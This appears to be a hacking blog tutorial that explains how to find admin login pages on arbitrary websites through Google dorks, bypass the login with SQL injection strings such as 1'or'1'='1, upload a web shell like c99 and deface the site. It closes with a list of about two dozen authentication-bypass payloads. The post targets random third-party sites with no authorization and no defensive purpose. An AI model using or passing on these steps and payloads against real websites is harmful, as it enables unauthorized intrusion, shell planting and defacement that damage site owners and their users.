A Basic SQL injection; How hackers deface by using it

I have been giving tutorials on the hacking of websites through various techniques like LFI, RFI, SQLi etc.  Sql injection can be done by using various tools like Acunetix, SQL helper, Havij etc. In my past tutorial I
showed you how havij is used by the hackers to scan a website for

vulnerability and then take advantage of the loop hole and gain access to the website.  There are various methods of this technique and In this tutorial I will be describing a very basic and simple Structured Query Language Injection (SQLi). Apart from this let me also tell that SQL injection technique  is widely used by hackers. I am of the perception that if 100 sites are hacked, 70 will be due to sql injection.  In this tutorial we will come to know how to find the website’s admin panel using a simple google dork and a SQL query to bypass the admin user name and password and enter into the panel. When we enter into the admin panel what we have to do is to find a file upload option and just upload a shell there like c99 shell etc. and finally deface the same.

                                   Click Here to Download DORKS

By entering these dorks many of the sites will open up having /adminlogin.aspx in their URL.

 Select any website, you will get the admin panel of the said website. 

Fill the details as: 

User: 1'or'1'='1

Password: 1'or'1'='1 

Using the above mentioned login details and you will enter  into the admin panel of a website.It will not work for all the websites but this is what is called a basic sql injection?

 Other Injection Queries are like this:

‘ or 1=1 –
1'or’1'=’1
 admin’–
 ” or 0=0 –
 or 0=0 –
‘ or 0=0 #
” or 0=0 #
 or 0=0 #
‘ or ‘x’='x
” or “x”=”x
 ‘) or (‘x’='x
 ‘ or 1=1–
” or 1=1–
 or 1=1–
‘ or a=a–
 ” or “a”=”a
 ‘) or (‘a’='a
“) or (“a”=”a
 hi” or “a”=”a
 hi” or 1=1 –
 hi’ or 1=1 –
 hi’ or ‘a’='a
 hi’) or (‘a’='a
 hi”) or (“a”=”)



If you enjoyed the article please share it......